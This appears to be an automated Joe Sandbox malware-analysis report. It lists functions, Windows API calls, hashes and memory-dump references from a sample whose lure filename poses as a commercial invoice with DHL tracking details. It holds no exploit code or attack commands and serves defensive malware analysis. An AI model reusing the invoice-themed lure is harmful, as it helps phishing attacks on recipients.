Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 6fd1119f36e85fdd5c3ba20e4984353f8b81bdeabd0b040907f46b0e7ed46983
Instruction ID: 6482b1074ffdebebddec33863996d2d69a41a0b37978d6ad95842f05e7043446
Opcode Fuzzy Hash: 6fd1119f36e85fdd5c3ba20e4984353f8b81bdeabd0b040907f46b0e7ed46983
Instruction Fuzzy Hash: 5D3181705157129FE721DF34D484797BBE8FB49708F00092EE69987240E771A554CB52

Function 01272FD7 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,01241129,00000000,00000000,00000000,?,0127328B,00000006,FlsSetValue,012E2290,FlsSetValue,00000000,00000364,?,01272E46,00000000), ref: 01273037
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 01273044

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 90b4191f913fc47be313f8fc7d22a71e0b2fa2ce8cb5f4f5f51c1223ecf097f7
Instruction ID: 95a86dd993c2c6539cd3df3eb5f4708a7de693a129458949ad59051e4c1d978c
Opcode Fuzzy Hash: 90b4191f913fc47be313f8fc7d22a71e0b2fa2ce8cb5f4f5f51c1223ecf097f7
Instruction Fuzzy Hash: 42110633A201329BEB37DE6DE85096B7795BB81760B060260FF15AB248D731EC01E7E1

Function 01245745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01245773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 01284052

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0526645f5ea698a757c9e2a44a78fadd3e597e8146dd3b90f3de9977c735b066
Instruction ID: 4f62218f7248cad58dbe9f9b0a4c7de7e13d0c7ec7695f93973b9d167f0a15b8
Opcode Fuzzy Hash: 0526645f5ea698a757c9e2a44a78fadd3e597e8146dd3b90f3de9977c735b066
Instruction Fuzzy Hash: 1B019230245226B7E3385A2ADC0EF977F98EF027B0F148310BB9C5A1E0C7B45455CB90

Function 01263414 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 01263600: try_get_function.LIBVCRUNTIME ref: 01263615

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01263432
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0126343D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 3287d4f10a58833377ff14d181220cc11e799184d9cfeccd8999b3208a09f476
Instruction ID: d46187304e05e4450a9713fa4209da501951c665bb77018ce8cec1b3a6015a38
Opcode Fuzzy Hash: 3287d4f10a58833377ff14d181220cc11e799184d9cfeccd8999b3208a09f476
Instruction Fuzzy Hash: E3D0A739534303589C1AEAB93442069524CF411A74350135AD428853C2DF20C0D11116

Function 0124B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0124BB4E

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 0c1df87b836eee97a710822fd7e66c205ee83343ee8c691ba727cfdd685afb11
Instruction ID: a02698423cd8d7eb2ffedac99ceaab33fca46358a5a8a74d499167fa60e9596e
Opcode Fuzzy Hash: 0c1df87b836eee97a710822fd7e66c205ee83343ee8c691ba727cfdd685afb11
Instruction Fuzzy Hash: 1132AF75A2020ADFEF28CF58C894ABEBBB9EF44314F148059EE05AB251D774ED41CB94

Function 01244ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 01244E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 01244E9C
Part of subcall function 01244E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,01244EDD,?,01311418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 01244EAE
Part of subcall function 01244E90: FreeLibrary.KERNEL32(00000000,?,?,01244EDD,?,01311418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 01244EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,01311418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 01244EFD

Part of subcall function 01244E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 01244E62
Part of subcall function 01244E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,01283CDE,?,01311418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 01244E74
Part of subcall function 01244E59: FreeLibrary.KERNEL32(00000000,?,?,01283CDE,?,01311418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 01244E87

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 223ce538d0cf8a8bc66d9dedd767f9c2a94db907d3d052be9b47db9c4c59fb85
Instruction ID: b0e5e0cbd2c5883c1b30d69875da8cef843e3daab05351520cc22e1db683f05a
Opcode Fuzzy Hash: 223ce538d0cf8a8bc66d9dedd767f9c2a94db907d3d052be9b47db9c4c59fb85
Instruction Fuzzy Hash: 9C11E332630306ABDB28FF64D805FBD77A59F60B10F10842DE682A61C0EEB4EA459750

Function 01278402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 01278440

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 595d012754c5e889841110a79b055097ed4d57e2df1c1b4a98d439a55f2f58a6
Instruction ID: 22ca23587b6f9bacb66a828ada7f447589003f8229291d9fef05ab399dd08b02
Opcode Fuzzy Hash: 595d012754c5e889841110a79b055097ed4d57e2df1c1b4a98d439a55f2f58a6
Instruction Fuzzy Hash: 7811487190410AAFCB05DF58E9449AB7BF8EF48310F004059F808AB301D670DA11CBA5

Function 01249A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,00000000,00000000), ref: 01249A9C

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d3d6ad96e5e8e96bd21136a784c34eaa92a2c8ee8531d39c2e5ab653281c6781
Instruction ID: 46af605ba02543f4fe56a04c251b95213d306edb26dc5e46512b115fe54c20f1
Opcode Fuzzy Hash: d3d6ad96e5e8e96bd21136a784c34eaa92a2c8ee8531d39c2e5ab653281c6781
Instruction Fuzzy Hash: FD116D31210B119FEF24CE09C480B63BBE8EB48658F00C42DEA9B86650C771E985CB60

Function 01275000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01274C7D: RtlAllocateHeap.NTDLL(00000008,01241129,00000000,?,01272E29,00000001,00000364,?,?,?,0126F2DE,01273863,01311444,?,0125FDF5,?), ref: 01274CBE

_free.LIBCMT ref: 0127506C

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction ID: 179bf9caadd2bb3fd670008b51991ba86f46fce1db0efc6bfada37170a7cce6d
Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction Fuzzy Hash: D601FE726143069BE332CF69D84596BFBEDFB89270F65051DE594932C0E6706805C774

Function 0126E469 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 0126E4BE

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
Instruction ID: 5c9a7ce88390554e174550b5e5d7ec47a6c6218c117e2b23e04d39195fa5338a
Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
Instruction Fuzzy Hash: 8401D875930349AFEB24EFB4CD457BFB7ECEB40224F11856EE41597280D671D9408760

Function 0126E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction ID: af694f7f49d1e502e8944e339a7cdc069a9bd6992ded212b28d0d09a131ea009
Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction Fuzzy Hash: 11F02836531A1AEEDB327A799C04B7B379C9F52330F110715F660931D0CBB0D88286A6

Function 01274C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,01241129,00000000,?,01272E29,00000001,00000364,?,?,?,0126F2DE,01273863,01311444,?,0125FDF5,?), ref: 01274CBE

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fbd187c24f615b53896c18993fed5fea060d9cf15c818342d03cc9747823ce03
Instruction ID: 1417f0c0cb521f431573d1ab27d1950c69f86458e833c4ae245c98d54cc79a2b
Opcode Fuzzy Hash: fbd187c24f615b53896c18993fed5fea060d9cf15c818342d03cc9747823ce03
Instruction Fuzzy Hash: 72F0E9316352A6A7EB217E769C09B6B3BCCAF516B0B09451EEF15A61D4CA70D84087E0

Function 01273820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,01311444,?,0125FDF5,?,?,0124A976,00000010,01311440,012413FC,?,012413C6,?,01241129), ref: 01273852

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a7730aa90962f4c00c058357f58b4e2ccd9cdf0a357177ff1ef228485eb3e2ff
Instruction ID: 96272ecf578903c920a32a5a95e05fc1bb49b0d71e4d4c4776b09a39b8bc2baa
Opcode Fuzzy Hash: a7730aa90962f4c00c058357f58b4e2ccd9cdf0a357177ff1ef228485eb3e2ff
Instruction Fuzzy Hash: FEE02B3213123797E7316A7B9C04FAB3B4DBF426B0F050122EF44925C0CB70D84192E1

Function 01274D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01274D9C

Part of subcall function 012729C8: HeapFree.KERNEL32(00000000,00000000), ref: 012729DE
Part of subcall function 012729C8: GetLastError.KERNEL32(00000000,?,0127D7D1,00000000,00000000,00000000,00000000,?,0127D7F8,00000000,00000007,00000000,?,0127DBF5,00000000,00000000), ref: 012729F0

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction ID: 2ee9ec9bdf7ba4a08c8f84475d5f7a40b398a2f32b24f80837ef51800e6c2681
Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction Fuzzy Hash: A2E092361513069F8720DF6CD400A82BBF4EF943607208529EADDD3310D331E412CB80

Function 01244F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,01311418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 01244F6D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 18806552f6042416378d07bb1625276ccef3545da4ca20080134c55f9ceddaa6
Instruction ID: 58ca37aa15418d43b1fcce5544df0f201778db4b429379dccbf4dcf3bbcb1d60
Opcode Fuzzy Hash: 18806552f6042416378d07bb1625276ccef3545da4ca20080134c55f9ceddaa6
Instruction Fuzzy Hash: A7F06571525792CFDB3CAF64D498922BBF4FF04219311897EE2EA83511C7719844CF10

Function 01242DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE ref: 01242DC4

Part of subcall function 01246B57: _wcslen.LIBCMT ref: 01246B6A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 6b7fb78265aac0058556a53beaf5139b6db3bf673f8b11dc7566ccccebb3d3c1
Instruction ID: 72abce783fd40d622f30d01fe94fc078504d48251cdf528459cade03530c79ba
Opcode Fuzzy Hash: 6b7fb78265aac0058556a53beaf5139b6db3bf673f8b11dc7566ccccebb3d3c1
Instruction Fuzzy Hash: 53E0CD72A012245BCB20A258DC09FEA77DDDFC8790F040075FD09E728CD960AD80C650

Function 012B2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 012B26B5

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 2544dc3c987efcc21f2a568e568024fcec3f1c4a9c57e603a465d9aa77976a91
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: BCE048B06197019FDF395A28A8517F677D89F49340F00045EF69B82252E5727445864D

Function 01242B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 01243837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 01243908

Part of subcall function 0124D730: GetInputState.USER32 ref: 0124D807

SetCurrentDirectoryW.KERNEL32(?), ref: 01242B6B

Part of subcall function 012430F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0124314E

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 38220a0aa9cf17f427932a81840025d6ad97765fc173b37c7a316070f6017603
Instruction ID: 339c7b734e167f18a4e04a6df20e0b89c54739dfa109e50ebee27d20893ebb12
Opcode Fuzzy Hash: 38220a0aa9cf17f427932a81840025d6ad97765fc173b37c7a316070f6017603
Instruction Fuzzy Hash: 56E0722232026A43CA0CFB78A4105FEF36DAFF4529F40163EE28383192CFA084898312

Function 0128039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,01280704,?,?,00000000), ref: 012803B7

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 000326bbd23c342964f4ca4ef64b5591f1346c2dcde106bda6d87a3f459556a7
Instruction ID: a2ef60be965d7d1473dafebbc5c45198bfe3175037b4f4135ed34ab675ded7e1
Opcode Fuzzy Hash: 000326bbd23c342964f4ca4ef64b5591f1346c2dcde106bda6d87a3f459556a7
Instruction Fuzzy Hash: 41D06C3204010DBBDF128E84ED06EDA3BAAFB48714F014000BE1856020C732E831EB90

